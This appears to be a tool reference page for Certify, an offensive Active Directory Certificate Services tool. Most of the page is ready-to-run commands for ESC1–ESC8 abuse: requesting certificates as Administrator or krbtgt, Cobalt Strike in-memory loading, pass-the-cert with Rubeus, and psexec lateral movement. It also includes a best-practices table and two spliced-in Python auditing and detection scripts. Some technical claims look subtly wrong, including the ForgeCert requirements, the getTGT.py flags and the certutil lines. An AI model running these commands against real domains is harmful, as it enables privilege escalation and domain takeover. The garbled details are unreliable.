Certify
Certify is a .NET tool for enumerating and abusing Active Directory Certificate Services (AD CS) to identify vulnerable certificate templates and misconfigured certification authorities for privilege escalation and lateral movement.
Installation
Compile from Source
Clone the GhostPack repository and compile with Visual Studio:
git clone https://github.com/GhostPack/Certify.git
cd Certify
# Open Certify.sln in Visual Studio 2019/2022
# Build > Build Solution (Release x64)
# Output: Certify.exe in bin/Release/
Precompiled Releases
Download precompiled binaries from the GitHub releases page:
# Extract and execute directly
.\Certify.exe find /vulnerable
Execute-Assembly in Cobalt Strike
Load Certify as a .NET assembly in Cobalt Strike for in-memory execution:
beacon> execute-assembly /path/to/Certify.exe find /vulnerable
Quick Start
Find Vulnerable Templates
# Enumerate all templates and identify those with known vulnerabilities (ESC1-ESC8)
Certify.exe find /vulnerable
Enumerate All CAs
# List all certification authorities in the domain
Certify.exe cas
Enumerate All Templates
# Display all certificate templates available for enrollment
Certify.exe find
Enumeration
Enumerate Certification Authorities
# List all CAs with detailed information
Certify.exe cas
# Output includes:
# - CA Name
# - DN (Distinguished Name)
# - Certificate Subject
# - Web Enrollment support
Enumerate Certificate Templates
# List all available templates with enrollment requirements
Certify.exe find
# Displays:
# - Template Name
# - EKU (Extended Key Usage)
# - Enrollment Rights
# - CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag
# - Manager Approval requirement
# - Authorized Signatures
Find Vulnerable Templates
# Identify templates vulnerable to ESC1-ESC8 attacks
Certify.exe find /vulnerable
# Highlights potentially exploitable misconfigurations
Filter by Template Purpose
# Find templates allowing client authentication (ESC1/ESC3)
Certify.exe find /clientauth
# Find templates where enrollee supplies subject (ESC1)
Certify.exe find /enrolleeSuppliesSubject
Enumerate PKI Objects and Permissions
# Display detailed PKI object information including permissions
Certify.exe pkiobjects
# Shows CA access control lists and enrollment agent permissions
Certificate Request
Basic Certificate Request
# Request certificate from specific CA using target template
Certify.exe request /ca:CA-SERVER.domain.com\CA-NAME /template:User
Subject Alternative Name (SAN) Abuse
# Add alternate principal name (ESC1 exploitation)
Certify.exe request /ca:CA-SERVER.domain.com\CA-NAME /template:User /altname:Administrator
# Common targets for SAN abuse:
# /altname:Administrator # Domain admin user
# /altname:DOMAIN\Administrator # Fully qualified name
# /altname:krbtgt # KDC account
On-Behalf-Of Enrollment
# Request certificate on behalf of another user (enrollment agent abuse)
Certify.exe request /ca:CA-SERVER.domain.com\CA-NAME /template:User /onbehalfof:DOMAIN\Administrator
Install Certificate After Request
# Install generated certificate in current user's personal store
Certify.exe request /ca:CA-SERVER.domain.com\CA-NAME /template:User /install
# Certificate stored in:
# Cert:\CurrentUser\My\[Thumbprint]
Export Certificate to File
# Request and output certificate/key to PFX (contains private key)
Certify.exe request /ca:CA-SERVER.domain.com\CA-NAME /template:User /install
# Retrieve from certificate store and export with openssl
# (See Integration section)
Vulnerable Template Identification
ESC1: Unrestricted Enrollment + SAN Abuse
Conditions:
- Template allows any principal to enroll
- Enrollee supplies subject (CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT set)
- EKU includes client authentication
- Manager approval not required
Certify identifies: [!] Enrollee supplies subject
Exploitation: Request cert with /altname:Administrator and use for authentication.
ESC2: Certificate Template Abuse (General Abuse)
Conditions:
- Any EKU allows any purpose
- Enrollee supplies subject enabled
- No manager approval
Certify identifies: [!] ANY_PURPOSE EKU
Exploitation: Request cert for arbitrary use cases (authentication, signing, encryption).
ESC3: Enrollment Agent Abuse
Conditions:
- Enrollment Agent template allows unrestricted enrollment
- Any principal can request as another user
- Target user’s template allows enrollment
Certify identifies: [!] Enrollment Agent template + enrollment rights mismatch
Exploitation: Use /onbehalfof to request certs for high-privilege users.
ESC4: Misconfigured Certificate Template Permissions
Conditions:
- Low-privileged user has ModifyTemplate rights
- Can modify template settings to create vulnerability
- Change EKU, CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, permissions
Certify identifies: Template permissions via pkiobjects
Exploitation: Modify template then request exploitable certificate.
ESC5: Vulnerable PKI Object Permissions
Conditions:
- Low-privileged user has dangerous permissions over CA/templates
- FullControl, Write, WriteDacl on PKI objects
- Can modify CA configuration or template settings
Certify identifies: via pkiobjects + low-priv user with ACE
Exploitation: Modify template CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT or CA settings.
ESC6: EDITF_ATTRIBUTESUBJECTALTNAME2 Flag
Conditions:
- CA has EDITF_ATTRIBUTESUBJECTALTNAME2 enabled
- Allows client-supplied SubjectAltName in requests
- Default template allows any user to request
Certify identifies: [!] CA has EDITF_ATTRIBUTESUBJECTALTNAME2 enabled
Exploitation: Request cert with arbitrary SAN on any template.
ESC7: Vulnerable CA Access Control
Conditions:
- Low-privileged user has dangerous permissions (Manage Certificates, etc.)
- Can approve/deny pending requests
- Can configure CA settings
Certify identifies: via pkiobjects + ACL review
Exploitation: Approve own requests, modify CA configuration.
ESC8: Web Enrollment Enabled
Conditions:
- CA has web enrollment service enabled
- Accessible without authentication or with weak auth
- No request validation
Certify identifies: [+] Web Enrollment Enabled
Exploitation: Submit request directly via HTTP without strong auth.
CA Enumeration Details
CA Permissions and Access Control
# Review CA access control lists
Certify.exe pkiobjects
# Look for:
# - Low-privileged users with "Manage Certificates"
# - Non-admin users with CA access
# - Enrollment agent permissions
EDITF Flags
# CA with EDITF_ATTRIBUTESUBJECTALTNAME2 allows client-supplied SANs
# This creates ESC6 vulnerability if any template allows unrestricted enrollment
Certify.exe cas
# Look for "[!] CA has EDITF_ATTRIBUTESUBJECTALTNAME2 enabled"
Web Enrollment Endpoints
# Check for enabled web enrollment service
Certify.exe cas
# Web enrollment typically hosted at:
# http://CA-SERVER/certsrv/
# https://CA-SERVER/certsrv/
# Request certificate via HTTP POST if authentication is weak/missing
Template Analysis
Understanding Certify Output
[+] Template Name: User
[+] Template Schema Version: 2
[+] Display Name: User
[+] Distinguished Name: CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com
[+] Enrollment Rights:
Authenticated Users - Full (2032)
[+] EKU: Client Authentication, Email Protection
[+] Enrollee Supplies Subject: True
[+] Manager Approval: False
[+] Requires Authorized Signatures: 0
[+] Authorized Signatures:
[+] CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT: True
Key Fields
| Field | Meaning |
|---|---|
| Enrollee Supplies Subject | User can specify certificate subject/SAN |
| CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT | Certificate template flag enabling above |
| EKU | Extended Key Usage (Client Auth, Server Auth, Code Signing, etc.) |
| Enrollment Rights | Which principals can request from this template |
| Manager Approval | Requires CA manager to approve request |
| Authorized Signatures | Number of authorized signatures required |
| ANY_PURPOSE | Dangerous EKU allowing any usage |
Dangerous Configurations
[!] Enrollee supplies subject
[!] Any principal can enroll
[!] Client Authentication EKU present
[!] Manager Approval: False
[!] Authorized Signatures: 0
# All together = ESC1 vulnerability
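The five ESC1 conditions listed above (and restated in this Dangerous Configurations block) can be checked mechanically against `find` output in the layout shown under Understanding Certify Output. The following is an added auditing example, not code from this page or the Certify project; it embeds a constructed two-template sample, and the set of principals treated as "any principal can enroll" is an assumption of the check.

```python
import re
# Constructed sample in the layout of the "Understanding Certify Output" section;
# not real CA data. "User" meets every ESC1 condition, "Workstation" does not.
SAMPLE_FIND_OUTPUT = """\
[+] Template Name: User
[+] Enrollment Rights:
Authenticated Users - Full (2032)
[+] EKU: Client Authentication, Email Protection
[+] Enrollee Supplies Subject: True
[+] Manager Approval: False
[+] Requires Authorized Signatures: 0
[+] Template Name: Workstation
[+] Enrollment Rights:
DOMAIN\\Domain Computers - Full (2032)
[+] EKU: Client Authentication
[+] Enrollee Supplies Subject: True
[+] Manager Approval: True
"""
# Principals treated as "any principal can enroll" (an assumption of this check).
BROAD_PRINCIPALS = {"authenticated users", "domain users", "everyone"}

def parse_templates(text):  # one dict per "[+] Template Name:" block
    templates, current = [], None
    for line in text.splitlines():
        m = re.match(r"\[\+\] ([^:]+):\s*(.*)", line)
        if not m:  # unprefixed lines under "Enrollment Rights:" name one principal each
            if current is not None and line.strip():
                current["Enrollment Rights"].append(line.split(" - ")[0].strip())
            continue
        key, value = m.group(1).strip(), m.group(2).strip()
        if key == "Template Name":
            current = {"Template Name": value, "Enrollment Rights": []}
            templates.append(current)
        elif current is not None and key != "Enrollment Rights":
            current[key] = value
    return templates

def esc1_conditions(t):  # the ESC1 conditions (as listed on this page) that t satisfies
    broad = any(p.split("\\")[-1].lower() in BROAD_PRINCIPALS for p in t["Enrollment Rights"])
    checks = {
        "any principal can enroll": broad,
        "enrollee supplies subject": t.get("Enrollee Supplies Subject", "").lower() == "true",
        "client authentication EKU": "client authentication" in t.get("EKU", "").lower(),
        "no manager approval": t.get("Manager Approval", "").lower() == "false",
        "no authorized signatures": t.get("Requires Authorized Signatures", "") == "0",
    }
    return [name for name, hit in checks.items() if hit]

def find_esc1(text):  # names of templates for which all five ESC1 conditions hold
    return [t["Template Name"] for t in parse_templates(text) if len(esc1_conditions(t)) == 5]
```

A template that misses even one condition (here Workstation: manager approval required, no broad enrollment principal) is reported by `esc1_conditions` but not by `find_esc1`, which mirrors the "all together" rule above.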
Certificate Installation and Usage
Export Certificate to PFX
# From certificate store to file
$cert = Get-ChildItem Cert:\CurrentUser\My\[Thumbprint]
$password = ConvertTo-SecureString -String "password" -AsPlainText -Force
Export-PfxCertificate -Cert $cert -FilePath cert.pfx -Password $password
Convert PFX to Rubeus Format
# Install openssl or use WSL
openssl pkcs12 -in cert.pfx -out cert.pem -nodes -passin pass:password
# Load into Rubeus for Kerberos authentication
Rubeus.exe asktgt /user:Administrator /certificate:cert.pem /createnetonly:C:\Windows\System32\cmd.exe
Pass-the-Cert Attack
# Use certificate for authentication without plaintext password
# Via Rubeus PKINIT
Rubeus.exe asktgt /user:Administrator /certificate:C:\path\to\cert.pfx /password:certpassword /createnetonly:C:\Windows\System32\cmd.exe
# Spawns process with TGT for Administrator
# Use for lateral movement and persistence
PKINIT and Kerberos
# PKINITtools - Kerberos authentication via certificate
# Requires certificate with Client Authentication EKU
# Request TGT using certificate identity
gettgtpkinit.py -cert-pfx cert.pfx -pfx-pass password domain.com\\Administrator administrator.ccache
# Use ccache for lateral movement
export KRB5CCNAME=administrator.ccache
psexec.py -k -no-pass DOMAIN/Administrator@TARGET
Troubleshooting
"Access Denied" During Enumeration
# Running as non-domain-joined user or unauthenticated
# Ensure domain connectivity and valid credentials
# Run as domain user:
runas /user:DOMAIN\username cmd.exe
# Then execute Certify.exe
No Vulnerable Templates Found
# May indicate:
# 1. Templates properly secured (no ESC conditions)
# 2. Organization hardened against ADCS attacks
# 3. Limited template visibility for current user
# Review all templates regardless:
Certify.exe find
# Manually analyze based on ESC conditions above
Certificate Request Denied
# Reasons:
# - Insufficient enrollment rights
# - Template requires manager approval (pending request)
# - CA configured to deny certain principals
# Check enrollment rights:
Certify.exe find /template:TemplateName
# Review "Enrollment Rights" output
Web Enrollment 404 or Unavailable
# CA web enrollment service not running or disabled
# Fallback to direct CA RPC interface
# Certify uses RPC by default, web enrollment is optional
# Check CA configuration for enabled services
Best Practices
| Practice | Description |
|---|---|
| Review All Templates | Run Certify.exe find and manually review against ESC conditions |
| Monitor Enrollments | Track certificate requests on CAs for suspicious activity |
| Restrict SAN Abuse | Disable CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT on sensitive templates |
| Enforce Approvals | Require manager approval for privileged templates |
| Limit Enrollment Rights | Restrict principals able to enroll (not Authenticated Users) |
| Disable EDITF Flags | Review and remove unnecessary EDITF_* flags on CAs |
| RBAC on PKI Objects | Limit template modification and CA access to admins |
| Certificate Auditing | Monitor issued certificates for anomalies |
| EKU Restrictions | Use specific EKUs (not ANY_PURPOSE) |
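The "Monitor Enrollments" and "Certificate Auditing" rows above amount to one concrete check: an issued certificate whose SAN names a different principal than the requester, or names one of the accounts listed under SAN abuse, needs review. The following is an added detection example, not code from this page or the Certify project; the record layout (RequestID, Requester, Template, SAN) and the sample lines are constructed stand-ins for whatever the CA audit trail or SIEM actually provides.

```python
import re

# Constructed issuance records, not real log data. The field layout is an assumption
# standing in for the CA's own issuance audit or its SIEM-normalised form.
SAMPLE_ISSUANCE_LOG = [
    "RequestID=1041 Requester=DOMAIN\\jsmith Template=User SAN=upn:jsmith@domain.com",
    "RequestID=1042 Requester=DOMAIN\\jsmith Template=User SAN=upn:Administrator@domain.com",
    "RequestID=1043 Requester=DOMAIN\\svc-web Template=WebServer SAN=dns:web01.domain.com",
    "RequestID=1044 Requester=DOMAIN\\bob Template=User SAN=upn:krbtgt@domain.com",
    "malformed line that the parser must skip",
]
# Accounts this page lists as common SAN-abuse targets; any SAN naming them is an alert.
SENSITIVE_ACCOUNTS = {"administrator", "krbtgt"}

RECORD_RE = re.compile(r"RequestID=(\d+) Requester=(\S+) Template=(\S+) SAN=(\w+):(\S+)$")

def parse_record(line):
    """Return a dict for one issuance record, or None when the line does not match."""
    m = RECORD_RE.match(line)
    if not m:
        return None
    rid, requester, template, san_type, san_value = m.groups()
    return {"id": int(rid), "requester": requester, "template": template,
            "san_type": san_type.lower(), "san": san_value}

def san_account(rec):
    """Account name carried in a UPN SAN, or None for other SAN types (dns, email, ...)."""
    return rec["san"].split("@")[0].lower() if rec["san_type"] == "upn" else None

def flag_suspicious(lines):
    """(request id, requester, SAN, reasons) for every record whose SAN warrants review."""
    alerts = []
    for line in lines:
        rec = parse_record(line)
        if rec is None:
            continue
        reasons, account = [], san_account(rec)
        # Requester is DOMAIN\sam; compare the sam part with the UPN's account part.
        if account is not None and account != rec["requester"].split("\\")[-1].lower():
            reasons.append("SAN principal differs from requester")
        if account in SENSITIVE_ACCOUNTS:
            reasons.append("SAN names a sensitive account")
        if reasons:
            alerts.append((rec["id"], rec["requester"], rec["san"], reasons))
    return alerts
```

A requester whose own UPN appears in the SAN (request 1041) and a DNS SAN on a server template (1043) produce no alert; the two records naming other principals do.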
Related Tools
Certipy (Python)
# Python ADCS enumeration and exploitation
certipy find -u user@domain.com -p password -dc-ip 10.0.0.1
certipy req -u user@domain.com -p password -ca CA-NAME -template User
ForgeCert
# Forge certificates without CA interaction
# Requires NTLM hash of CA account
ForgeCert.exe --CaCert ca-cert.cer --CaKey ca-key.key --Subject CN=Administrator
Rubeus
# Kerberos manipulation and PKINIT authentication
# Integrated with certificate-based authentication
Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx
PKINITtools
# Kerberos PKINIT support and certificate-based auth
# Cross-platform (Python/Linux)
getTGT.py -cert-pfx cert.pfx DOMAIN/Administrator
Certutil (Native Windows)
# Native Windows utility for certificate operations
certutil -config CA-NAME -ca.cert ca-cert.cer
# Request certificate directly
certutil -ca.cert -crl